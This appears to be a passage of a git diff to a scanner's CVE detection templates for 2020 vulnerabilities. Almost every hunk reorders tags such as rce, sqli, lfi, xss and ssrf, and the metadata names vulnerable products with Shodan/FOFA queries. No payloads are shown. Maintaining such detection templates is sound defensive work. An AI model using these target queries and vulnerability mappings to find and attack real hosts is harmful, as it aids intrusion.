http.title:"GitLab" - tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020 + tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm http: - method: GET diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 3dbe0193b0..18c0e0d210 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: wdja product: wdja_cms - tags: cve,cve2020,xss,wdja,shadoweb + tags: cve2020,cve,xss,wdja,shadoweb http: - method: GET diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 21dcbd05d6..b57929ebde 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: domainmod product: domainmod - tags: cve,cve2020,domainmod,xss,authenticated + tags: cve2020,cve,domainmod,xss,authenticated http: - raw: diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index d34a97520f..65710b8316 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: inspur product: clusterengine - tags: cve,cve2020,clusterengine,rce,inspur + tags: cve2020,cve,clusterengine,rce,inspur http: - method: POST diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index f92c8477ab..67f55fa640 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -27,7 +27,7 @@ info: product: 74cms shodan-query: http.html:"74cms" fofa-query: app="74cms" - tags: cve,cve2020,74cms,sqli + tags: cve2020,cve,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 6c444d5e7a..9ade88cdf5 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: b2evolution product: b2evolution - tags: packetstorm,edb,cve,cve2020,redirect,b2evolution + tags: cve,cve2020,packetstorm,edb,redirect,b2evolution http: - method: GET diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 81ab239d04..c083e0883e 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: opnsense product: opnsense - tags: cve,cve2020,redirect,opnsense + tags: cve2020,cve,redirect,opnsense http: - method: GET diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index baee6c1117..0c059058a1 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: kyocera product: d-copia253mf_plus_firmware - tags: cve,cve2020,printer,iot,lfi,edb,kyocera + tags: cve2020,cve,printer,iot,lfi,edb,kyocera http: - method: GET diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 5df1b2e07d..f2080f982c 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -29,7 +29,7 @@ info: vendor: gmapfp product: gmapfp framework: joomla\! - tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\! + tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\! variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index e29321f356..6ca2244a89 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -30,8 +30,6 @@ info: fofa-query: body="import-xml-feed" tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency -flow: http(1) && http(2) - http: - raw: - | diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 72169167f8..53a331fbba 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -27,7 +27,7 @@ info: vendor: gvectors product: wpdiscuz framework: wordpress - tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive,gvectors + tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors http: - raw: diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 55b15281d5..53d937ae9d 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: mara_cms_project product: mara_cms - tags: cve,cve2020,mara,xss,edb,mara_cms_project + tags: cve2020,cve,mara,xss,edb,mara_cms_project http: - method: GET diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index bf41ae66fe..32cb381290 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: wso2 product: api_manager - tags: cve,cve2020,wso2,xxe,oast,blind + tags: cve2020,cve,wso2,xxe,oast,blind http: - raw: diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 6a46570590..b3d0176eda 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -25,7 +25,7 @@ info: vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" - tags: packetstorm,seclists,cve,cve2020,appsuite,xss,open-xchange + tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange http: - method: GET diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 9d17bf40a5..a48c4afc53 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: qcubed product: qcubed - tags: cve,cve2020,qcubed,xss,seclists + tags: cve2020,cve,qcubed,xss,seclists http: - method: POST diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index e47a8817d5..abdf60db86 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: php-fusion product: php-fusion - tags: rce,php,packetstorm,cve,cve2020,phpfusion,php-fusion + tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion http: - method: GET diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index ef8a71c607..6e99291514 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -30,7 +30,7 @@ info: vendor: webdesi9 product: file_manager framework: wordpress - tags: wordpress,rce,kev,fileupload,intrusive,packetstorm,cve,cve2020,webdesi9 + tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9 http: - raw: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 4b178352c7..c35ea91fe3 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: xinuos product: openserver - tags: cve,cve2020,sco,xss,edb,packetstorm,intrusive,xinuos + tags: cve2020,cve,sco,xss,edb,packetstorm,intrusive,xinuos http: - method: GET diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 0345b53a4d..9bd6988195 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: oracle product: weblogic_server - tags: cve,cve2020,oracle,weblogic,rce,unauth,kev + tags: cve2020,cve,oracle,weblogic,rce,unauth,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index e74179974f..506ab6de0a 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thinkadmin product: thinkadmin - tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020,ctolog + tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog http: - method: GET diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index c8bfac028f..fc2ee52340 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -27,7 +27,7 @@ info: vendor: eventespresso product: event_espresso framework: wordpress - tags: cve,cve2020,xss,wordpress,wp-plugin,eventespresso + tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso http: - method: GET diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 7963860e49..c973ddbafb 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -29,7 +29,7 @@ info: vendor: prestashop product: productcomments framework: prestashop - tags: packetstorm,cve,cve2020,sqli,prestshop,prestashop + tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop http: - raw: diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index f8fce4ad5c..a20e30c02f 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -27,7 +27,7 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" - tags: hackerone,cve,cve2020,gitlab,exposure,enum,graphql + tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql http: - raw: diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index ff555fe689..a7a3ae4e53 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: emby product: emby - tags: cve,cve2020,emby,jellyfin,ssrf + tags: cve2020,cve,emby,jellyfin,ssrf http: - method: GET diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index dc9e9ef52c..0d731c8f12 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: lionwiki product: lionwiki - tags: cve,cve2020,lionwiki,lfi,oss + tags: cve2020,cve,lionwiki,lfi,oss http: - method: GET diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 254e368b75..e6f5ef60ff 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -27,7 +27,7 @@ info: vendor: oracle product: jd_edwards_enterpriseone_tools shodan-query: port:8999 product:"Oracle WebLogic Server" - tags: cve,cve2020,oracle,weblogic,disclosure,exposure + tags: cve2020,cve,oracle,weblogic,disclosure,exposure http: - method: GET diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 597ea1cebb..2ccc17d0c9 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -27,7 +27,7 @@ info: vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: goodlayerslms,sqli,wpscan,cve,cve2020,goodlayers,wordpress + tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress http: - raw: diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 8dd0bc1273..a7338b0846 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -27,7 +27,7 @@ info: vendor: icewarp product: mail_server shodan-query: title:"icewarp" - tags: xss,icewarp,packetstorm,cve,cve2020 + tags: cve,cve2020,xss,icewarp,packetstorm http: - method: GET diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index dc1a4e51ad..90b09b547d 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -28,7 +28,7 @@ info: vendor: terra-master product: tos fofa-query: '"TerraMaster" && header="TOS"' - tags: cve,cve2020,terramaster,enum,tos,terra-master + tags: cve2020,cve,terramaster,enum,tos,terra-master http: - raw: diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 1507fb28c9..be6e0a4178 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: terra-master product: tos - tags: packetstorm,cve,cve2020,terramaster,rce,oast,mirai,unauth,terra-master + tags: cve2020,cve,packetstorm,terramaster,rce,oast,mirai,unauth,terra-master variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 3fbb980839..d1dcd1a172 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rocket.chat product: rocket.chat - tags: packetstorm,cve,cve2020,rocketchat,rocket.chat + tags: cve,cve2020,packetstorm,rocketchat,rocket.chat http: - raw: diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index bee3eb44be..77006b15f5 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mitel product: shoretel_firmware - tags: packetstorm,cve,cve2020,shoretel,xss,mitel + tags: cve,cve2020,packetstorm,shoretel,xss,mitel http: - method: GET diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index d5fede3cac..616af3e7ef 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: monitorr_project product: monitorr - tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce,monitorr_project + tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project http: - raw: diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 220497d9a8..5cfebf6ef3 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -28,7 +28,7 @@ info: vendor: canto product: canto framework: wordpress - tags: packetstorm,cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb,canto + tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto http: - method: GET diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 641b4382b8..a8120692c4 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: rainbowfishsoftware product: pacsone_server - tags: pacsone,xss,cve,cve2020,rainbowfishsoftware + tags: cve,cve2020,pacsone,xss,rainbowfishsoftware http: - method: GET diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 19b139c2b0..0a78ce8cca 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: car_rental_management_system_project product: car_rental_management_system - tags: cve,cve2020,lfi,car_rental_management_system_project + tags: cve,cve2020,lfi,car_rental_management_system_project,sqli http: - method: GET diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index bcbdf2e43a..b6484c08d7 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: multi_restaurant_table_reservation_system_project product: multi_restaurant_table_reservation_system - tags: cve2020,tablereservation,sqli,unauth,edb,cve,multi_restaurant_table_reservation_system_project + tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project http: - method: GET diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index bb4e6cfb7a..f9102fcabf 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -30,7 +30,7 @@ info: max-request: 2 vendor: cisco product: adaptive_security_appliance_software - tags: lfi,kev,packetstorm,cve,cve2020,cisco + tags: cve,cve2020,lfi,kev,packetstorm,cisco http: - method: GET diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 0cde6078dd..3d54b7c0bb 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -25,7 +25,7 @@ info: vendor: wp-ecommerce product: easy_wp_smtp framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,smtp,wp-ecommerce + tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce http: - method: GET diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index db246ba91b..a22d046232 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: searchblox product: searchblox - tags: cve,cve2020,lfi,searchblox + tags: cve2020,cve,lfi,searchblox http: - method: GET diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 21f9a0107b..e76caa8d0e 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: advanced_comment_system_project product: advanced_comment_system - tags: acs,edb,seclists,cve,cve2020,lfi,advanced_comment_system_project + tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project http: - method: GET diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index ab447c3ee1..fdff73a20c 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -27,7 +27,7 @@ info: vendor: presstigers product: simple_board_job framework: wordpress - tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve,presstigers + tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers http: - raw: diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 04af26fb6c..8096a1cecc 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: twitter product: twitter-server - tags: cve,cve2020,xss,twitter-server,twitter + tags: cve2020,cve,xss,twitter-server,twitter http: - method: GET diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index 3271793a4e..0394452535 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -26,7 +26,7 @@ info: vendor: expresstech product: quiz_and_survey_master framework: wordpress - tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive,expresstech + tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech http: - raw: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 49dd7f35c0..2c9ef8eaca 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel - tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index b1b1856d0f..c3db4397f2 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -26,7 +26,7 @@ info: vendor: smartstore product: smartstorenet shodan-query: http.html:'content="Smartstore' - tags: cve,cve2020,redirect,smartstore + tags: cve2020,cve,redirect,smartstore http: - method: GET diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index f1d9dbff70..d295b6e10d 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -27,7 +27,7 @@ info: vendor: codetipi product: 15zine framework: wordpress - tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan,codetipi + tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi http: - method: GET diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 9b0b1a5645..2dcea2689d 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpgurukul product: hospital_management_system - tags: cve2020,hms,cms,xss,authenticated,edb,cve,phpgurukul + tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul http: - raw: diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 0549e17bb3..affccd074b 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: phpgurukul product: hospital_management_system - tags: cve2020,hms,cms,sqli,authenticated,edb,cve,phpgurukul + tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index e91e989bda..c9e2ae7ce9 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: phpgurukul product: dairy_farm_shop_management_system - tags: sqli,edb,cve,cve2020,phpgurukul + tags: cve,cve2020,sqli,edb,phpgurukul http: - raw: diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 85238b71d2..8817055728 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_config - tags: cve,cve2020,lfi,springcloud,vmware + tags: cve2020,cve,lfi,springcloud,vmware http: - method: GET diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 3b32fc90ea..51f1826ba8 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -25,7 +25,7 @@ info: vendor: magmi_project product: magmi shodan-query: http.component:"Magento" - tags: magmi,magento,tenable,cve,cve2020,magmi_project + tags: cve,cve2020,magmi,magento,tenable,magmi_project http: - raw: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index a2f1e202fb..4f0df59c6e 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -26,7 +26,7 @@ info: vendor: magmi_project product: magmi shodan-query: http.component:"Magento" - tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass,magmi_project + tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project http: - raw: diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index c54fbe67bd..b1a8d1045c 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: unraid product: unraid - tags: cve,cve2020,rce,kev,unraid + tags: cve2020,cve,rce,kev,unraid http: - method: GET diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index a6936c41ad..6c43556720 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -34,7 +34,7 @@ info: max-request: 8 vendor: f5 product: big-ip_access_policy_manager - tags: cve2020,bigip,rce,kev,packetstorm,cve,f5 + tags: cve,cve2020,bigip,rce,kev,packetstorm,f5 http: - method: GET diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 588379f8de..67fff32f7f 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: solution_manager - tags: cve,cve2020,sap,solman,rce,kev + tags: cve2020,cve,sap,solman,rce,kev http: - raw: diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 682a8eeb1a..f45b693e77 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sap product: businessobjects_business_intelligence_platform - tags: cve,cve2020,sap,ssrf,oast,unauth + tags: cve2020,cve,sap,ssrf,oast,unauth http: - raw: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 1c518eb5ff..bdab9ed277 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -29,7 +29,7 @@ info: vendor: etoilewebdesign product: ultimate_faq framework: wordpress - tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp,etoilewebdesign + tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign http: - method: GET diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index 9b4253b2e7..679a12c6bd 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: puppet product: puppet_enterprise - tags: cve,cve2020,puppet,exposure,puppetdb + tags: cve2020,cve,puppet,exposure,puppetdb http: - method: GET diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index a6f582fded..322ba020bf 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: liferay product: liferay_portal - tags: packetstorm,cve,cve2020,rce,liferay,kev + tags: cve2020,cve,packetstorm,rce,liferay,kev http: - raw: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index a99af0e010..6ddf7107b2 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -27,7 +27,7 @@ info: vendor: intelliantech product: aptus_web shodan-query: http.title:"Intellian Aptus Web" - tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce,intelliantech + tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech http: - raw: diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 3bce2b99ac..814c1498cf 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -26,7 +26,7 @@ info: max-request: 6 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2020,citrix,lfi,kev,packetstorm + tags: cve2020,cve,citrix,lfi,kev,packetstorm http: - raw: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index ad29fa152b..20f2943b58 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: citrix product: xenmobile_server - tags: cve,cve2020,citrix,lfi,xenmobile + tags: cve2020,cve,citrix,lfi,xenmobile http: - method: GET diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 26906cc1e2..63f5ba0d63 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -28,7 +28,7 @@ info: vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" - tags: edb,packetstorm,cve,cve2020,xss,icewarp + tags: cve,cve2020,edb,packetstorm,xss,icewarp http: - method: GET diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 63275e7356..e87e3f324a 100644 --- 